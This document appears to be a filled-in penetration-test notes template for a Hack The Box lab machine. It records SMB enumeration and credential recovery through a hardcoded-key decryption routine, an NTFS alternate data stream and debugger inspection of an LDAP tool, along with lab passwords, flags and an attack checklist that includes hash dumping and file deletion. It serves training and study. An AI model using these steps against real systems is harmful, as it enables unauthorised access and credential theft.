10.x.x.x

Enumeration

TCP

    nmap -p- -Pn 10.10.10.178
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 19:54 EDT
    Nmap scan report for 10.10.10.178
    Host is up (0.10s latency).
    Not shown: 65533 filtered ports
    PORT     STATE SERVICE
    445/tcp  open  microsoft-ds
    4386/tcp open  unknown

    Nmap done: 1 IP address (1 host up) scanned in 289.43 seconds

UDP

Web Services

Nikto

Dirb\DirBuster

WebDav

CMS

Other Services

SMB

    smbclient \\\\10.10.10.178\\Data
    Enter WORKGROUP\kali's password:
    Try "help" to get a list of possible commands.
    smb: \> recurse on
    smb: \> ls
      .                        D        0  Wed Aug  7 18:53:46 2019
      ..                       D        0  Wed Aug  7 18:53:46 2019
      IT                       D        0  Wed Aug  7 18:58:07 2019
      Production               D        0  Mon Aug  5 17:53:38 2019
      Reports                  D        0  Mon Aug  5 17:53:44 2019
      Shared                   D        0  Wed Aug  7 15:07:51 2019

    \IT
    NT_STATUS_ACCESS_DENIED listing \IT\*

    \Production
    NT_STATUS_ACCESS_DENIED listing \Production\*

    \Reports
    NT_STATUS_ACCESS_DENIED listing \Reports\*

    \Shared
      .                        D        0  Wed Aug  7 15:07:51 2019
      ..                       D        0  Wed Aug  7 15:07:51 2019
      Maintenance              D        0  Wed Aug  7 15:07:32 2019
      Templates                D        0  Wed Aug  7 15:08:07 2019

    \Shared\Maintenance
      .                        D        0  Wed Aug  7 15:07:32 2019
      ..                       D        0  Wed Aug  7 15:07:32 2019
      Maintenance Alerts.txt   A       48  Mon Aug  5 19:01:44 2019

    \Shared\Templates
      .                        D        0  Wed Aug  7 15:08:07 2019
      ..                       D        0  Wed Aug  7 15:08:07 2019
      HR                       D        0  Wed Aug  7 15:08:01 2019
      Marketing                D        0  Wed Aug  7 15:08:06 2019

    \Shared\Templates\HR
      .                        D        0  Wed Aug  7 15:08:01 2019
      ..                       D        0  Wed Aug  7 15:08:01 2019
      Welcome Email.txt        A      425  Wed Aug  7 18:55:36 2019

    \Shared\Templates\Marketing
      .                        D        0  Wed Aug  7 15:08:06 2019
      ..                       D        0  Wed Aug  7 15:08:06 2019
    smb: \>

    Maintenance Alerts:

    cat Maintenance\ Alerts.txt
    There is currently no scheduled maintenance work.

    Welcome Email:

    cat Welcome\ Email.txt
    We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

    You will find your home folder in the following location:
    \\HTB-NEST\Users\<USERNAME>

    If you have any issues accessing specific services or workstations, please inform the
    IT department and use the credentials below until all systems have been set up for you.

    Username: TempUser
    Password: welcome2019

    Thank you
    HR

    kali@kali:~/Nest$ smbclient \\\\10.10.10.178\\Data -U TempUser
    Enter WORKGROUP\TempUser's password:
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                        D        0  Wed Aug  7 18:53:46 2019
      ..                       D        0  Wed Aug  7 18:53:46 2019
      IT                       D        0  Wed Aug  7 18:58:07 2019
      Production               D        0  Mon Aug  5 17:53:38 2019
      Reports                  D        0  Mon Aug  5 17:53:44 2019
      Shared                   D        0  Wed Aug  7 15:07:51 2019

                    10485247 blocks of size 4096. 6544154 blocks available
    smb: \> recurse on
    smb: \> ls
      .                        D        0  Wed Aug  7 18:53:46 2019
      ..                       D        0  Wed Aug  7 18:53:46 2019
      IT                       D        0  Wed Aug  7 18:58:07 2019
      Production               D        0  Mon Aug  5 17:53:38 2019
      Reports                  D        0  Mon Aug  5 17:53:44 2019
      Shared                   D        0  Wed Aug  7 15:07:51 2019

    \IT
      .                        D        0  Wed Aug  7 18:58:07 2019
      ..                       D        0  Wed Aug  7 18:58:07 2019
      Archive                  D        0  Mon Aug  5 18:33:58 2019
      Configs                  D        0  Wed Aug  7 18:59:34 2019
      Installs                 D        0  Wed Aug  7 18:08:30 2019
      Reports                  D        0  Sat Jan 25 19:09:13 2020
      Tools                    D        0  Mon Aug  5 18:33:43 2019

    \Production
      .                        D        0  Mon Aug  5 17:53:38 2019
      ..                       D        0  Mon Aug  5 17:53:38 2019

    \Reports
      .                        D        0  Mon Aug  5 17:53:44 2019
      ..                       D        0  Mon Aug  5 17:53:44 2019

    \Shared
      .                        D        0  Wed Aug  7 15:07:51 2019
      ..                       D        0  Wed Aug  7 15:07:51 2019
      Maintenance              D        0  Wed Aug  7 15:07:32 2019
      Templates                D        0  Wed Aug  7 15:08:07 2019

    \IT\Archive
      .                        D        0  Mon Aug  5 18:33:58 2019
      ..                       D        0  Mon Aug  5 18:33:58 2019

    \IT\Configs
      .                        D        0  Wed Aug  7 18:59:34 2019
      ..                       D        0  Wed Aug  7 18:59:34 2019
      Adobe                    D        0  Wed Aug  7 15:20:09 2019
      Atlas                    D        0  Tue Aug  6 07:16:18 2019
      DLink                    D        0  Tue Aug  6 09:25:27 2019
      Microsoft                D        0  Wed Aug  7 15:23:26 2019
      NotepadPlusPlus          D        0  Wed Aug  7 15:31:37 2019
      RU Scanner               D        0  Wed Aug  7 16:01:13 2019
      Server Manager           D        0  Tue Aug  6 09:25:19 2019

    \IT\Installs
      .                        D        0  Wed Aug  7 18:08:30 2019
      ..                       D        0  Wed Aug  7 18:08:30 2019

    \IT\Reports
      .                        D        0  Sat Jan 25 19:09:13 2020
      ..                       D        0  Sat Jan 25 19:09:13 2020

    \IT\Tools
      .                        D        0  Mon Aug  5 18:33:43 2019
      ..                       D        0  Mon Aug  5 18:33:43 2019

    \Shared\Maintenance
      .                        D        0  Wed Aug  7 15:07:32 2019
      ..                       D        0  Wed Aug  7 15:07:32 2019
      Maintenance Alerts.txt   A       48  Mon Aug  5 19:01:44 2019

    \Shared\Templates
      .                        D        0  Wed Aug  7 15:08:07 2019
      ..                       D        0  Wed Aug  7 15:08:07 2019
      HR                       D        0  Wed Aug  7 15:08:01 2019
      Marketing                D        0  Wed Aug  7 15:08:06 2019

    \IT\Configs\Adobe
      .                        D        0  Wed Aug  7 15:20:09 2019
      ..                       D        0  Wed Aug  7 15:20:09 2019
      editing.xml             AH      246  Sat Aug  3 08:58:42 2019
      Options.txt              A        0  Mon Oct 10 17:11:14 2011
      projects.xml             A      258  Tue Jan  8 11:30:52 2013
      settings.xml             A     1274  Wed Aug  7 15:19:12 2019

    \IT\Configs\Atlas
      .                        D        0  Tue Aug  6 07:16:18 2019
      ..                       D        0  Tue Aug  6 07:16:18 2019
      Temp.XML                 A     1369  Wed Jun 11 03:38:22 2003

    \IT\Configs\DLink
      .                        D        0  Tue Aug  6 09:25:27 2019
      ..                       D        0  Tue Aug  6 09:25:27 2019

    \IT\Configs\Microsoft
      .                        D        0  Wed Aug  7 15:23:26 2019
      ..                       D        0  Wed Aug  7 15:23:26 2019
      Options.xml              A     4598  Sat Mar  3 14:24:24 2012

    \IT\Configs\NotepadPlusPlus
      .                        D        0  Wed Aug  7 15:31:37 2019
      ..                       D        0  Wed Aug  7 15:31:37 2019
      config.xml               A     6451  Wed Aug  7 19:01:25 2019
      shortcuts.xml            A     2108  Wed Aug  7 15:30:27 2019

    \IT\Configs\RU Scanner
      .                        D        0  Wed Aug  7 16:01:13 2019
      ..                       D        0  Wed Aug  7 16:01:13 2019
      RU_config.xml            A      270  Thu Aug  8 15:49:37 2019

    \IT\Configs\Server Manager
      .                        D        0  Tue Aug  6 09:25:19 2019
      ..                       D        0  Tue Aug  6 09:25:19 2019

    \Shared\Templates\HR
      .                        D        0  Wed Aug  7 15:08:01 2019
      ..                       D        0  Wed Aug  7 15:08:01 2019
      Welcome Email.txt        A      425  Wed Aug  7 18:55:36 2019

    \Shared\Templates\Marketing
      .                        D        0  Wed Aug  7 15:08:06 2019
      ..                       D        0  Wed Aug  7 15:08:06 2019

                    10485247 blocks of size 4096. 6544154 blocks available
    smb: \>

    smb: \IT\> cd Carl
    smb: \IT\Carl\> ls
      .                        D        0  Wed Aug  7 15:42:14 2019
      ..                       D        0  Wed Aug  7 15:42:14 2019
      Docs                     D        0  Wed Aug  7 15:44:00 2019
      Reports                  D        0  Tue Aug  6 09:45:40 2019
      VB Projects              D        0  Tue Aug  6 10:41:55 2019

    \IT\Carl\Docs
      .                        D        0  Wed Aug  7 15:44:00 2019
      ..                       D        0  Wed Aug  7 15:44:00 2019
      ip.txt                   A       56  Wed Aug  7 15:44:16 2019
      mmc.txt                  A       73  Wed Aug  7 15:43:42 2019

    \IT\Carl\Reports
      .                        D        0  Tue Aug  6 09:45:40 2019
      ..                       D        0  Tue Aug  6 09:45:40 2019

    \IT\Carl\VB Projects
      .                        D        0  Tue Aug  6 10:41:55 2019
      ..                       D        0  Tue Aug  6 10:41:55 2019
      Production               D        0  Tue Aug  6 10:07:13 2019
      WIP                      D        0  Tue Aug  6 10:47:41 2019

    \IT\Carl\VB Projects\Production
      .                        D        0  Tue Aug  6 10:07:13 2019
      ..                       D        0  Tue Aug  6 10:07:13 2019

    \IT\Carl\VB Projects\WIP
      .                        D        0  Tue Aug  6 10:47:41 2019
      ..                       D        0  Tue Aug  6 10:47:41 2019
      RU                       D        0  Fri Aug  9 11:36:45 2019

    \IT\Carl\VB Projects\WIP\RU
      .                        D        0  Fri Aug  9 11:36:45 2019
      ..                       D        0  Fri Aug  9 11:36:45 2019
      RUScanner                D        0  Wed Aug  7 18:05:54 2019
      RUScanner.sln            A      871  Tue Aug  6 10:45:36 2019

    \IT\Carl\VB Projects\WIP\RU\RUScanner
      .                        D        0  Wed Aug  7 18:05:54 2019
      ..                       D        0  Wed Aug  7 18:05:54 2019
      bin                      D        0  Wed Aug  7 16:00:11 2019
      ConfigFile.vb            A      772  Wed Aug  7 18:05:09 2019
      Module1.vb               A      279  Wed Aug  7 18:05:44 2019
      My Project               D        0  Wed Aug  7 16:00:11 2019
      obj                      D        0  Wed Aug  7 16:00:11 2019
      RU Scanner.vbproj        A     4828  Fri Aug  9 11:37:51 2019
      RU Scanner.vbproj.user   A      143  Tue Aug  6 08:55:27 2019
      SsoIntegration.vb        A      133  Wed Aug  7 18:05:58 2019
      Utils.vb                 A     4888  Wed Aug  7 15:49:35 2019

    \IT\Carl\VB Projects\WIP\RU\RUScanner\bin
      .                        D        0  Wed Aug  7 16:00:11 2019
      ..                       D        0  Wed Aug  7 16:00:11 2019
      Debug                    D        0  Wed Aug  7 15:59:13 2019
      Release                  D        0  Tue Aug  6 08:55:26 2019

    \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
      .                        D        0  Wed Aug  7 16:00:11 2019
      ..                       D        0  Wed Aug  7 16:00:11 2019
      Application.Designer.vb  A      441  Tue Aug  6 08:55:13 2019
      Application.myapp        A      481  Tue Aug  6 08:55:13 2019
      AssemblyInfo.vb          A     1163  Tue Aug  6 08:55:13 2019
      Resources.Designer.vb    A     2776  Tue Aug  6 08:55:13 2019
      Resources.resx           A     5612  Tue Aug  6 08:55:13 2019
      Settings.Designer.vb     A     2989  Tue Aug  6 08:55:13 2019
      Settings.settings        A      279  Tue Aug  6 08:55:13 2019

    \IT\Carl\VB Projects\WIP\RU\RUScanner\obj
      .                        D        0  Wed Aug  7 16:00:11 2019
      ..                       D        0  Wed Aug  7 16:00:11 2019
      x86                      D        0  Wed Aug  7 15:59:18 2019

    \IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
      .                        D        0  Wed Aug  7 15:59:13 2019
      ..                       D        0  Wed Aug  7 15:59:13 2019

    \IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
      .                        D        0  Tue Aug  6 08:55:26 2019
      ..                       D        0  Tue Aug  6 08:55:26 2019

    \IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
      .                        D        0  Wed Aug  7 15:59:18 2019
      ..                       D        0  Wed Aug  7 15:59:18 2019

                    10485247 blocks of size 4096. 6544154 blocks available

SNMP

DB

Other

    Imports System.Text
    Imports System.Security.Cryptography

    Public Class Utils

        ' Scanner configuration, stored on disk as XML.
        Public Class ConfigFile
            Public Property Port As Integer
            Public Property Username As String
            Public Property Password As String

            Public Sub SaveToFile(Path As String)
                Using File As New System.IO.FileStream(Path, System.IO.FileMode.Create)
                    Dim Writer As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
                    Writer.Serialize(File, Me)
                End Using
            End Sub

            Public Shared Function LoadFromFile(ByVal FilePath As String) As ConfigFile
                Using File As New System.IO.FileStream(FilePath, System.IO.FileMode.Open)
                    Dim Reader As New System.Xml.Serialization.XmlSerializer(GetType(ConfigFile))
                    Return DirectCast(Reader.Deserialize(File), ConfigFile)
                End Using
            End Function
        End Class

        ' Passphrase, salt, iteration count, IV and key size are all hardcoded here,
        ' so anyone who can read this source can decrypt the stored password.
        Public Shared Function DecryptString(EncryptedString As String) As String
            If String.IsNullOrEmpty(EncryptedString) Then
                Return String.Empty
            Else
                Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
            End If
        End Function

        ' AES-CBC decryption with a PBKDF2 (Rfc2898DeriveBytes) derived key.
        Public Shared Function Decrypt(ByVal cipherText As String, _
                                       ByVal passPhrase As String, _
                                       ByVal saltValue As String, _
                                       ByVal passwordIterations As Integer, _
                                       ByVal initVector As String, _
                                       ByVal keySize As Integer) _
                                       As String

            Dim initVectorBytes As Byte()
            initVectorBytes = Encoding.ASCII.GetBytes(initVector)

            Dim saltValueBytes As Byte()
            saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

            Dim cipherTextBytes As Byte()
            cipherTextBytes = System.Convert.FromBase64String(cipherText)

            Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                                   saltValueBytes, _
                                                   passwordIterations)

            Dim keyBytes As Byte()
            keyBytes = password.GetBytes(CInt(keySize / 8))

            Dim symmetricKey As New AesCryptoServiceProvider
            symmetricKey.Mode = CipherMode.CBC

            Dim decryptor As ICryptoTransform
            decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

            Dim memoryStream As System.IO.MemoryStream
            memoryStream = New System.IO.MemoryStream(cipherTextBytes)

            Dim cryptoStream As CryptoStream
            cryptoStream = New CryptoStream(memoryStream, _
                                            decryptor, _
                                            CryptoStreamMode.Read)

            Dim plainTextBytes As Byte()
            ReDim plainTextBytes(cipherTextBytes.Length)

            Dim decryptedByteCount As Integer
            decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                                   0, _
                                                   plainTextBytes.Length)

            memoryStream.Close()
            cryptoStream.Close()

            Dim plainText As String
            plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                                 0, _
                                                 decryptedByteCount)

            System.Console.WriteLine(plainText)
            Return plainText
        End Function

        Public Class SsoIntegration
            Public Property Username As String
            Public Property Password As String
        End Class

        ' Main must be Shared to serve as the entry point when it lives inside a class.
        Public Shared Sub Main()
            Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
        End Sub
    End Class

Script Results

    Service Exploited:
    Vulnerability Type:
    Exploit POC:
    Description:

    Discovery of Vulnerability

    Exploit Code Used

    get "Debug Mode Password.txt:Password:$DATA"

    We suddenly have a file name Debug Mode Password.txt:Password:$DATA that contains WBQ201953D8w.

    Proof\Local.txt File
    ☐ Screenshot with ifconfig\ipconfig
    ☐ Submit to OSCP Exam Panel

Post Exploitation

Host Information

    Operating System
    Architecture
    Domain
    Installed Updates

File System

    Writeable Files\Directories
    Directory List

Running Processes

    Process List

Installed Applications

    Installed Applications

Users & Groups

    Users
    Groups

Network

    IPConfig\IFConfig
    Network Processes
    ARP
    DNS
    Route

Scheduled Tasks

Priv Escalation

    Service Exploited:
    Vulnerability Type:
    Exploit POC:
    Description:

    Discovery of Vulnerability

    setdir ..
    list
    setdir ldap
    >showquery 2

    Domain=nest.local
    Port=389
    BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
    User=Administrator
    Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

    Exploit Code Used

    Create ldap.conf on Windows machine with the contents

    Domain=nest.local
    Port=389
    BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
    User=Administrator
    Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

    Import HqkLdap.exe into dnSpy and set a breakpoint on Console.WriteLine in the Main module
    Set a watch condition on ldap.Password
    Run HqkLdap.exe to the breakpoint

    Administrator:XtH4nkS4Pl4y1nGX

    smbclient \\\\10.10.10.178\\C$

    Proof\Local.txt File
    ☐ Screenshot with ifconfig\ipconfig
    ☐ Submit to OSCP Exam Panel

Goodies

Hashes

Passwords

    c.smith:xRxRxPANCAK3SxRxRx
    Debug Mode: WBQ201953D8w.
    Administrator:XtH4nkS4Pl4y1nGX

Proof\Flags\Other

    User - cf71b25404be5d84fd827e05f426e987
    Root - 6594c2eb084bc0f08a42f0b94b878c41

Software Versions

    Software Versions
    Potential Exploits

Methodology

    Network Scanning
    ☐ nmap -sn 10.11.1.*
    ☐ nmap -sL 10.11.1.*
    ☐ nbtscan -r 10.11.1.0/24
    ☐ smbtree

    Individual Host Scanning
    ☐ nmap --top-ports 20 --open -iL iplist.txt
    ☐ nmap -sS -A -sV -O -p- ipaddress
    ☐ nmap -sU ipaddress

    Service Scanning

    WebApp
    ☐ Nikto
    ☐ dirb
    ☐ dirbuster
    ☐ wpscan
    ☐ dotdotpwn
    ☐ view source
    ☐ davtest\cadaver
    ☐ droopscan
    ☐ joomscan
    ☐ LFI\RFI Test

    Linux\Windows
    ☐ snmpwalk -c public -v1 ipaddress 1
    ☐ smbclient -L //ipaddress
    ☐ showmount -e ipaddress port
    ☐ rpcinfo
    ☐ Enum4Linux

    Anything Else
    ☐ nmap scripts (locate *nse* | grep servicename)
    ☐ hydra
    ☐ MSF Aux Modules
    ☐ Download the software

    Exploitation
    ☐ Gather Version Numbers
    ☐ Searchsploit
    ☐ Default Creds
    ☐ Creds Previously Gathered
    ☐ Download the software

    Post Exploitation

    Linux
    ☐ linux-local-enum.sh
    ☐ linuxprivchecker.py
    ☐ linux-exploit-suggestor.sh
    ☐ unix-privesc-check.py

    Windows
    ☐ wpc.exe
    ☐ windows-exploit-suggestor.py
    ☐ windows_privesc_check.py
    ☐ windows-privesc-check2.exe

    Priv Escalation
    ☐ access internal services (portfwd)
    ☐ add account

    Windows
    ☐ List of exploits

    Linux
    ☐ sudo su
    ☐ KernelDB
    ☐ Searchsploit

    Final
    ☐ Screenshot of IPConfig\WhoamI
    ☐ Copy proof.txt
    ☐ Dump hashes
    ☐ Dump SSH Keys
    ☐ Delete files

Log Book